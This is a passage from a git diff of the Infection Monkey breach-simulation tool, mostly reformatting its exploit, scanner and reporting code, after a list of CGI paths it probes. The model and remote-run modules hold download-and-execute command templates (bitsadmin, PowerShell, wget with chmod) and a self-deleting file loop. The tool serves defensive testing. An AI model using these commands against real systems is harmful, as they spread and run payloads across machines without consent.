r'/cgi-bin/ezadmin.cgi',
r'/cgi-bin/ezboard.cgi',
r'/cgi-bin/ezman.cgi',
r'/cgi-bin/ezshopper2/loadpage.cgi',
r'/cgi-bin/ezshopper3/loadpage.cgi',
r'/cgi-bin/ezshopper/loadpage.cgi',
r'/cgi-bin/ezshopper/search.cgi',
r'/cgi-bin/faqmanager.cgi',
r'/cgi-bin/FileSeek2.cgi',
r'/cgi-bin/FileSeek.cgi',
r'/cgi-bin/finger.cgi',
r'/cgi-bin/flexform.cgi',
r'/cgi-bin/fom.cgi',
r'/cgi-bin/fom/fom.cgi',
r'/cgi-bin/FormHandler.cgi',
r'/cgi-bin/FormMail.cgi',
r'/cgi-bin/gbadmin.cgi',
r'/cgi-bin/gbook/gbook.cgi',
r'/cgi-bin/generate.cgi',
r'/cgi-bin/getdoc.cgi',
r'/cgi-bin/gH.cgi',
r'/cgi-bin/gm-authors.cgi',
r'/cgi-bin/gm.cgi',
r'/cgi-bin/gm-cplog.cgi',
r'/cgi-bin/guestbook.cgi',
r'/cgi-bin/handler',
r'/cgi-bin/handler.cgi',
r'/cgi-bin/handler/netsonar',
r'/cgi-bin/hitview.cgi',
r'/cgi-bin/hsx.cgi',
r'/cgi-bin/html2chtml.cgi',
r'/cgi-bin/html2wml.cgi',
r'/cgi-bin/htsearch.cgi',
r'/cgi-bin/hw.sh', # testing
r'/cgi-bin/icat',
r'/cgi-bin/if/admin/nph-build.cgi',
r'/cgi-bin/ikonboard/help.cgi',
r'/cgi-bin/ImageFolio/admin/admin.cgi',
r'/cgi-bin/imageFolio.cgi',
r'/cgi-bin/index.cgi',
r'/cgi-bin/infosrch.cgi',
r'/cgi-bin/jammail.pl',
r'/cgi-bin/journal.cgi',
r'/cgi-bin/lastlines.cgi',
r'/cgi-bin/loadpage.cgi',
r'/cgi-bin/login.cgi',
r'/cgi-bin/logit.cgi',
r'/cgi-bin/log-reader.cgi',
r'/cgi-bin/lookwho.cgi',
r'/cgi-bin/lwgate.cgi',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/MachineInfo',
r'/cgi-bin/magiccard.cgi',
r'/cgi-bin/mail/emumail.cgi',
r'/cgi-bin/maillist.cgi',
r'/cgi-bin/mailnews.cgi',
r'/cgi-bin/mail/nph-mr.cgi',
r'/cgi-bin/main.cgi',
r'/cgi-bin/main_menu.pl',
r'/cgi-bin/man.sh',
r'/cgi-bin/mini_logger.cgi',
r'/cgi-bin/mmstdod.cgi',
r'/cgi-bin/moin.cgi',
r'/cgi-bin/mojo/mojo.cgi',
r'/cgi-bin/mrtg.cgi',
r'/cgi-bin/mt.cgi',
r'/cgi-bin/mt/mt.cgi',
r'/cgi-bin/mt/mt-check.cgi',
r'/cgi-bin/mt/mt-load.cgi',
r'/cgi-bin/mt-static/mt-check.cgi',
r'/cgi-bin/mt-static/mt-load.cgi',
r'/cgi-bin/musicqueue.cgi',
r'/cgi-bin/myguestbook.cgi',
r'/cgi-bin/.namazu.cgi',
r'/cgi-bin/nbmember.cgi',
r'/cgi-bin/netauth.cgi',
r'/cgi-bin/netpad.cgi',
r'/cgi-bin/newsdesk.cgi',
r'/cgi-bin/nlog-smb.cgi',
r'/cgi-bin/nph-emumail.cgi',
r'/cgi-bin/nph-exploitscanget.cgi',
r'/cgi-bin/nph-publish.cgi',
r'/cgi-bin/nph-test.cgi',
r'/cgi-bin/pagelog.cgi',
r'/cgi-bin/pbcgi.cgi',
r'/cgi-bin/perlshop.cgi',
r'/cgi-bin/pfdispaly.cgi',
r'/cgi-bin/pfdisplay.cgi',
r'/cgi-bin/phf.cgi',
r'/cgi-bin/photo/manage.cgi',
r'/cgi-bin/photo/protected/manage.cgi',
r'/cgi-bin/php-cgi',
r'/cgi-bin/php.cgi',
r'/cgi-bin/php.fcgi',
r'/cgi-bin/ping.sh',
r'/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi',
r'/cgi-bin/pollssi.cgi',
r'/cgi-bin/postcards.cgi',
r'/cgi-bin/powerup/r.cgi',
r'/cgi-bin/printenv',
r'/cgi-bin/probecontrol.cgi',
r'/cgi-bin/profile.cgi',
r'/cgi-bin/publisher/search.cgi',
r'/cgi-bin/quickstore.cgi',
r'/cgi-bin/quizme.cgi',
r'/cgi-bin/ratlog.cgi',
r'/cgi-bin/r.cgi',
r'/cgi-bin/register.cgi',
r'/cgi-bin/replicator/webpage.cgi/',
r'/cgi-bin/responder.cgi',
r'/cgi-bin/robadmin.cgi',
r'/cgi-bin/robpoll.cgi',
r'/cgi-bin/rtpd.cgi',
r'/cgi-bin/sbcgi/sitebuilder.cgi',
r'/cgi-bin/scoadminreg.cgi',
r'/cgi-bin-sdb/printenv',
r'/cgi-bin/sdbsearch.cgi',
r'/cgi-bin/search',
r'/cgi-bin/search.cgi',
r'/cgi-bin/search/search.cgi',
r'/cgi-bin/sendform.cgi',
r'/cgi-bin/shop.cgi',
r'/cgi-bin/shopper.cgi',
r'/cgi-bin/shopplus.cgi',
r'/cgi-bin/showcheckins.cgi',
r'/cgi-bin/simplestguest.cgi',
r'/cgi-bin/simplestmail.cgi',
r'/cgi-bin/smartsearch.cgi',
r'/cgi-bin/smartsearch/smartsearch.cgi',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.bat',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/snorkerz.cmd',
r'/cgi-bin/sojourn.cgi',
r'/cgi-bin/spin_client.cgi',
r'/cgi-bin/start.cgi',
r'/cgi-bin/status',
r'/cgi-bin/status_cgi',
r'/cgi-bin/store/agora.cgi',
r'/cgi-bin/store.cgi',
r'/cgi-bin/store/index.cgi',
r'/cgi-bin/survey.cgi',
r'/cgi-bin/sync.cgi',
r'/cgi-bin/talkback.cgi',
r'/cgi-bin/technote/main.cgi',
r'/cgi-bin/test2.pl',
r'/cgi-bin/test-cgi',
r'/cgi-bin/test.cgi',
r'/cgi-bin/testing_whatever',
r'/cgi-bin/test/test.cgi',
r'/cgi-bin/tidfinder.cgi',
r'/cgi-bin/tigvote.cgi',
r'/cgi-bin/title.cgi',
r'/cgi-bin/top.cgi',
r'/cgi-bin/traffic.cgi',
r'/cgi-bin/troops.cgi',
r'/cgi-bin/ttawebtop.cgi/',
r'/cgi-bin/ultraboard.cgi',
r'/cgi-bin/upload.cgi',
r'/cgi-bin/urlcount.cgi',
r'/cgi-bin/viewcvs.cgi',
r'/cgi-bin/view_help.cgi',
r'/cgi-bin/viralator.cgi',
r'/cgi-bin/virgil.cgi',
r'/cgi-bin/vote.cgi',
r'/cgi-bin/vpasswd.cgi',
r'/cgi-bin/way-board.cgi',
r'/cgi-bin/way-board/way-board.cgi',
r'/cgi-bin/webbbs.cgi',
r'/cgi-bin/webcart/webcart.cgi',
r'/cgi-bin/webdist.cgi',
r'/cgi-bin/webif.cgi',
r'/cgi-bin/webmail/html/emumail.cgi',
r'/cgi-bin/webmap.cgi',
r'/cgi-bin/webspirs.cgi',
r'/cgi-bin/Web_Store/web_store.cgi',
r'/cgi-bin/whois.cgi',
r'/cgi-bin/whois_raw.cgi',
r'/cgi-bin/whois/whois.cgi',
r'/cgi-bin/wrap',
r'/cgi-bin/wrap.cgi',
r'/cgi-bin/wwwboard.cgi.cgi',
r'/cgi-bin/YaBB/YaBB.cgi',
r'/cgi-bin/zml.cgi',
r'/cgi-mod/index.cgi',
r'/cgis/wwwboard/wwwboard.cgi',
r'/cgi-sys/addalink.cgi',
r'/cgi-sys/defaultwebpage.cgi',
r'/cgi-sys/domainredirect.cgi',
r'/cgi-sys/entropybanner.cgi',
r'/cgi-sys/entropysearch.cgi',
r'/cgi-sys/FormMail-clone.cgi',
r'/cgi-sys/helpdesk.cgi',
r'/cgi-sys/mchat.cgi',
r'/cgi-sys/randhtml.cgi',
r'/cgi-sys/realhelpdesk.cgi',
r'/cgi-sys/realsignup.cgi',
r'/cgi-sys/signup.cgi',
r'/connector.cgi',
r'/cp/rac/nsManager.cgi',
r'/create_release.sh',
r'/CSNews.cgi',
r'/csPassword.cgi',
r'/dcadmin.cgi',
r'/dcboard.cgi',
r'/dcforum.cgi',
r'/dcforum/dcforum.cgi',
r'/debuff.cgi',
r'/debug.cgi',
r'/details.cgi',
r'/edittag/edittag.cgi',
r'/emumail.cgi',
r'/enter_buff.cgi',
r'/enter_bug.cgi',
r'/ez2000/ezadmin.cgi',
r'/ez2000/ezboard.cgi',
r'/ez2000/ezman.cgi',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo',
r'/fcgi-bin/echo2',
r'/fcgi-bin/echo2',
r'/Gozila.cgi',
r'/hitmatic/analyse.cgi',
r'/hp_docs/cgi-bin/index.cgi',
r'/html/cgi-bin/cgicso',
r'/html/cgi-bin/cgicso',
r'/index.cgi',
r'/info.cgi',
r'/infosrch.cgi',
r'/login.cgi',
r'/mailview.cgi',
r'/main.cgi',
r'/megabook/admin.cgi',
r'/ministats/admin.cgi',
r'/mods/apage/apage.cgi',
r'/_mt/mt.cgi',
r'/musicqueue.cgi',
r'/ncbook.cgi',
r'/newpro.cgi',
r'/newsletter.sh',
r'/oem_webstage/cgi-bin/oemapp_cgi',
r'/page.cgi',
r'/parse_xml.cgi',
r'/photodata/manage.cgi',
r'/photo/manage.cgi',
r'/print.cgi',
r'/process_buff.cgi',
r'/process_bug.cgi',
r'/pub/english.cgi',
r'/quikmail/nph-emumail.cgi',
r'/quikstore.cgi',
r'/reviews/newpro.cgi',
r'/ROADS/cgi-bin/search.pl',
r'/sample01.cgi',
r'/sample02.cgi',
r'/sample03.cgi',
r'/sample04.cgi',
r'/sampleposteddata.cgi',
r'/scancfg.cgi',
r'/scancfg.cgi',
r'/servers/link.cgi',
r'/setpasswd.cgi',
r'/SetSecurity.shm',
r'/shop/member_html.cgi',
r'/shop/normal_html.cgi',
r'/site_searcher.cgi',
r'/siteUserMod.cgi',
r'/submit.cgi',
r'/technote/print.cgi',
r'/template.cgi',
r'/test.cgi',
r'/ucsm/isSamInstalled.cgi',
r'/upload.cgi',
r'/userreg.cgi',
r'/users/scripts/submit.cgi',
r'/vood/cgi-bin/vood_view.cgi',
r'/Web_Store/web_store.cgi',
r'/webtools/bonsai/ccvsblame.cgi',
r'/webtools/bonsai/cvsblame.cgi',
r'/webtools/bonsai/cvslog.cgi',
r'/webtools/bonsai/cvsquery.cgi',
r'/webtools/bonsai/cvsqueryform.cgi',
r'/webtools/bonsai/showcheckins.cgi',
r'/wwwadmin.cgi',
r'/wwwboard.cgi',
r'/wwwboard/wwwboard.cgi'
)

7
monkey/infection_monkey/exploit/struts2.py
View File

@ -3,13 +3,14 @@
code used is from https://www.exploit-db.com/exploits/41570/
Vulnerable struts2 versions <=2.3.31 and <=2.5.10
"""
import urllib.request, urllib.error, urllib.parse
import http.client
import unicodedata
import logging
import re
import ssl
import urllib.error
import urllib.parse
import urllib.request
import logging
from infection_monkey.exploit.web_rce import WebRCE
__author__ = "VakarisZ"

8
monkey/infection_monkey/exploit/tools/http_tools.py
View File

@ -1,14 +1,16 @@
import logging
import os
import os.path
import urllib.request, urllib.parse, urllib.error
import urllib.error
import urllib.parse
import urllib.request
from threading import Lock
from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target
from infection_monkey.model import DOWNLOAD_TIMEOUT
from infection_monkey.network.firewall import app as firewall
from infection_monkey.network.info import get_free_tcp_port
from infection_monkey.transport import HTTPServer, LockedHTTPServer
from infection_monkey.exploit.tools.helpers import try_get_target_monkey, get_interface_to_target
from infection_monkey.model import DOWNLOAD_TIMEOUT
__author__ = 'itamar'

3
monkey/infection_monkey/exploit/wmiexec.py
View File

@ -39,7 +39,8 @@ class WmiExploiter(HostExploiter):
password_hashed = self._config.hash_sensitive_data(password)
lm_hash_hashed = self._config.hash_sensitive_data(lm_hash)
mtlm_hash_hashed = self._config.hash_sensitive_data(ntlm_hash)
creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): ({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
creds_for_logging = "user, password (SHA-512), lm hash (SHA-512), ntlm hash (SHA-512): " \
"({},{},{},{})".format(user, password_hashed, lm_hash_hashed, mtlm_hash_hashed)
LOG.debug(("Attempting to connect %r using WMI with " % self.host) + creds_for_logging)
wmi_connection = WmiTools.WmiConnection()

9
monkey/infection_monkey/main.py
View File

@ -1,5 +1,3 @@
import argparse
import json
import logging
@ -23,8 +21,11 @@ LOG = None
LOG_CONFIG = {'version': 1,
'disable_existing_loggers': False,
'formatters': {'standard': {
'format': '%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'},
'formatters': {
'standard': {
'format':
'%(asctime)s [%(process)d:%(thread)d:%(levelname)s] %(module)s.%(funcName)s.%(lineno)d: %(message)s'
},
},
'handlers': {'console': {'class': 'logging.StreamHandler',
'level': 'DEBUG',

9
monkey/infection_monkey/model/__init__.py
View File

@ -11,11 +11,14 @@ MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, )
GENERAL_CMDLINE_LINUX = '(cd %(monkey_directory)s && %(monkey_commandline)s)'
DROPPER_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, )
MONKEY_CMDLINE_DETACHED_WINDOWS = 'cmd /c start cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, )
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd /c %%(monkey_path)s %s"' % (MONKEY_ARG, )
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&cmd ' \
'/c %%(monkey_path)s %s"' % (MONKEY_ARG, )
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(' \
'file_path)s exit)) > NUL 2>&1 '
# Commands used for downloading monkeys
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(" \
"monkey_path)s\' -UseBasicParsing\" "
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
BITSADMIN_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
CHMOD_MONKEY = "chmod +x %(monkey_path)s"

1
monkey/infection_monkey/monkeyfs.py
View File

@ -34,7 +34,6 @@ class VirtualFile(BytesIO):
return path in VirtualFile._vfs
def getsize(path):
if path.startswith(MONKEYFS_PREFIX):
return VirtualFile.getsize(path)

7
monkey/infection_monkey/network/firewall.py
View File

@ -8,6 +8,7 @@ def _run_netsh_cmd(command, args):
if value])), stdout=subprocess.PIPE)
return cmd.stdout.read().strip().lower().endswith('ok.')
class FirewallApp(object):
def is_enabled(self, **kwargs):
return False
@ -83,9 +84,9 @@ class WinAdvFirewall(FirewallApp):
for rule in list(self._rules.values()):
if rule.get('program') == sys.executable and \
'in' == rule.get('dir') and \
'allow' == rule.get('action') and \
4 == len(list(rule.keys())):
'in' == rule.get('dir') and \
'allow' == rule.get('action') and \
4 == len(list(rule.keys())):
return True
return False

2
monkey/infection_monkey/network/httpfinger.py
View File

@ -39,7 +39,7 @@ class HTTPFinger(HostFinger):
ssl = True if 'https://' in url else False
self.init_service(host.services, ('tcp-' + port[1]), port[0])
host.services['tcp-' + port[1]]['name'] = 'http'
host.services['tcp-' + port[1]]['data'] = (server,ssl)
host.services['tcp-' + port[1]]['data'] = (server, ssl)
LOG.info("Port %d is open on host %s " % (port[0], host))
break # https will be the same on the same port
except Timeout:

15
monkey/infection_monkey/network/ping_scanner.py
View File

@ -20,7 +20,6 @@ LOG = logging.getLogger(__name__)
class PingScanner(HostScanner, HostFinger):
_SCANNED_SERVICE = ''
def __init__(self):
@ -49,14 +48,12 @@ class PingScanner(HostScanner, HostFinger):
if not "win32" == sys.platform:
timeout /= 1000
sub_proc = subprocess.Popen(["ping",
PING_COUNT_FLAG,
"1",
PING_TIMEOUT_FLAG,
str(timeout), host.ip_addr],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True)
sub_proc = subprocess.Popen(
["ping", PING_COUNT_FLAG, "1", PING_TIMEOUT_FLAG, str(timeout), host.ip_addr],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
output = " ".join(sub_proc.communicate())
regex_result = self._ttl_regex.search(output)

10
monkey/infection_monkey/network/smbfinger.py
View File

@ -30,7 +30,7 @@ class Packet:
return b"".join(content_list)
##### SMB Packets #####
# SMB Packets
class SMBHeader(Packet):
fields = odict([
("proto", b"\xff\x53\x4d\x42"),
@ -92,7 +92,13 @@ class SMBSessionFingerData(Packet):
("capabilities", b"\xd4\x00\x00\xa0"),
("bcc1", ""),
("Data",
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
b"\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02"
b"\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
b"\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63"
b"\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00"
b"\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35"
b"\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
])

3
monkey/infection_monkey/network/tcp_scanner.py
View File

@ -25,7 +25,8 @@ class TcpScanner(HostScanner, HostFinger):
Scans a target host to see if it's alive using the tcp_target_ports specified in the configuration.
:param host: VictimHost structure
:param only_one_port: Currently unused.
:return: T/F if there is at least one open port. In addition, the host object is updated to mark those services as alive.
:return: T/F if there is at least one open port.
In addition, the host object is updated to mark those services as alive.
"""
# maybe hide under really bad detection systems

2
monkey/infection_monkey/system_info/SSH_info_collector.py
View File

@ -63,7 +63,7 @@ class SSHCollector(object):
LOG.info("Found public key in %s" % public)
try:
with open(public) as f:
info['public_key'] = f.read()
info['public_key'] = f.read()
# By default private key has the same name as public, only without .pub
private = os.path.splitext(public)[0]
if os.path.exists(private):

2
monkey/infection_monkey/transport/base.py
View File

@ -27,4 +27,4 @@ def update_last_serve_time():
def get_last_serve_time():
global g_last_served
return g_last_served
return g_last_served

2
monkey/monkey_island/cc/models/test_monkey.py
View File

@ -84,7 +84,7 @@ class TestMonkey(IslandTestCase):
self.clean_monkey_db()
linux_monkey = Monkey(guid=str(uuid.uuid4()),
description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu SMP Mon May 6 18:46:08 UTC 2019 x86_64 x86_64")
description="Linux shay-Virtual-Machine 4.15.0-50-generic #54-Ubuntu")
windows_monkey = Monkey(guid=str(uuid.uuid4()),
description="Windows bla bla bla")
unknown_monkey = Monkey(guid=str(uuid.uuid4()),

8
monkey/monkey_island/cc/resources/root.py
View File

@ -1,18 +1,18 @@
from datetime import datetime
import logging
import threading
from datetime import datetime
import flask_restful
from flask import request, make_response, jsonify
from monkey_island.cc.auth import jwt_required
from monkey_island.cc.database import mongo
from monkey_island.cc.services.database import Database
from monkey_island.cc.services.node import NodeService
from monkey_island.cc.services.reporting.report import ReportService
from monkey_island.cc.services.attack.attack_report import AttackReportService
from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, safe_generate_reports
from monkey_island.cc.services.reporting.report_generation_synchronisation import is_report_being_generated, \
safe_generate_reports
from monkey_island.cc.utils import local_ip_addresses
from monkey_island.cc.services.database import Database
__author__ = 'Barak'

5
monkey/monkey_island/cc/services/attack/attack_report.py
View File

@ -75,7 +75,10 @@ class AttackReportService:
Gets timestamp of latest attack telem
:return: timestamp of latest attack telem
"""
return [x['timestamp'] for x in mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)][0]
return [
x['timestamp'] for x in
mongo.db.telemetry.find({'telem_category': 'attack'}).sort('timestamp', -1).limit(1)
][0]
@staticmethod
def get_latest_report():

15
monkey/monkey_island/cc/services/config.py
View File

@ -122,11 +122,16 @@ class ConfigService:
@staticmethod
def ssh_add_keys(public_key, private_key, user, ip):
if not ConfigService.ssh_key_exists(ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'],
False, False), user, ip):
ConfigService.add_item_to_config_set('internal.exploits.exploit_ssh_keys',
{"public_key": public_key, "private_key": private_key,
"user": user, "ip": ip})
if not ConfigService.ssh_key_exists(
ConfigService.get_config_value(['internal', 'exploits', 'exploit_ssh_keys'], False, False), user, ip):
ConfigService.add_item_to_config_set(
'internal.exploits.exploit_ssh_keys',
{
"public_key": public_key,
"private_key": private_key,
"user": user, "ip": ip
}
)
@staticmethod
def ssh_key_exists(keys, user, ip):

2
monkey/monkey_island/cc/services/remote_run_aws.py
View File

@ -131,7 +131,7 @@ class RemoteRunAwsService:
return r"[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {" \
r"$true}; (New-Object System.Net.WebClient).DownloadFile('https://" + island_ip + \
r":5000/api/monkey/download/monkey-windows-" + bit_text + r".exe','.\\monkey.exe'); " \
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
r";Start-Process -FilePath '.\\monkey.exe' -ArgumentList 'm0nk3y -s " + island_ip + r":5000'; "
@staticmethod
def _get_run_monkey_cmd_line(is_linux, is_64bit, island_ip):

107
monkey/monkey_island/cc/services/reporting/aws_exporter.py
View File

@ -148,8 +148,8 @@ class AWSExporter(Exporter):
severity=5,
title="Weak segmentation - Machines were able to communicate over unused ports.",
description="Use micro-segmentation policies to disable communication other than the required.",
recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}"
.format(issue['machine'], issue['dest']),
recommendation="Machines are not locked down at port level. "
"Network tunnel was set up from {0} to {1}".format(issue['machine'], issue['dest']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -160,10 +160,12 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=10,
title="Samba servers are vulnerable to 'SambaCry'",
description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \
.format(issue['username']),
recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format(
issue['machine'], issue['ip_address'], issue['username']),
description="Change {0} password to a complex one-use password that is not shared with other computers on the "
"network. Update your Samba server to 4.4.14 and up, "
"4.5.10 and up, or 4.6.4 and up.".format(issue['username']),
recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB "
"protocol with user {2} and its password, and used the SambaCry "
"vulnerability.".format(issue['machine'], issue['ip_address'], issue['username']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -174,10 +176,10 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=5,
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
issue['username']),
recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format(
issue['machine'], issue['ip_address'], issue['username']),
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
"network.".format(issue['username']),
recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over "
"SMB protocol with user {2}.".format(issue['machine'], issue['ip_address'], issue['username']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -188,10 +190,11 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=1,
title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
issue['username']),
recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format(
issue['machine'], issue['ip_address'], issue['username']),
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
"network.".format(issue['username']),
recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH"
" protocol with user {2} and its "
"password.".format(issue['machine'], issue['ip_address'], issue['username']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -203,8 +206,11 @@ class AWSExporter(Exporter):
severity=1,
title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']),
recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format(
machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']),
recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated "
"over the SSH protocol with private key {ssh_key}.".format(
machine=issue['machine'],
ip_address=issue['ip_address'],
ssh_key=issue['ssh_key']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -216,8 +222,10 @@ class AWSExporter(Exporter):
severity=10,
title="Elastic Search servers are vulnerable to CVE-2015-1427",
description="Update your Elastic Search server to version 1.4.3 and up.",
recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
issue['machine'], issue['ip_address']),
recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made "
"possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
issue['machine'],
issue['ip_address']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -228,13 +236,13 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=1,
title="Weak segmentation - Machines from different segments are able to communicate.",
description="Segment your network and make sure there is no communication between machines from different segments.",
description="Segment your network and make sure there is no communication between machines from different "
"segments.",
recommendation="The network can probably be segmented. A monkey instance on \
{0} in the networks {1} \
could directly access the Monkey Island server in the networks {2}.".format(issue['machine'],
issue['networks'],
issue[
'server_networks']),
issue['server_networks']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -259,8 +267,9 @@ class AWSExporter(Exporter):
title="Machines are vulnerable to 'Shellshock'",
description="Update your Bash to a ShellShock-patched version.",
recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
"The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format(
issue['machine'], issue['ip_address'], issue['port'], issue['paths']),
"The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a "
"shell injection attack on the paths: {3}.".format(
issue['machine'], issue['ip_address'], issue['port'], issue['paths']),
instance_arn=instance_arn,
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
)
@ -271,10 +280,13 @@ class AWSExporter(Exporter):
return AWSExporter._build_generic_finding(
severity=1,
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
issue['username']),
recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format(
issue['machine'], issue['ip_address'], issue['username']),
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the "
"network.".format(issue['username']),
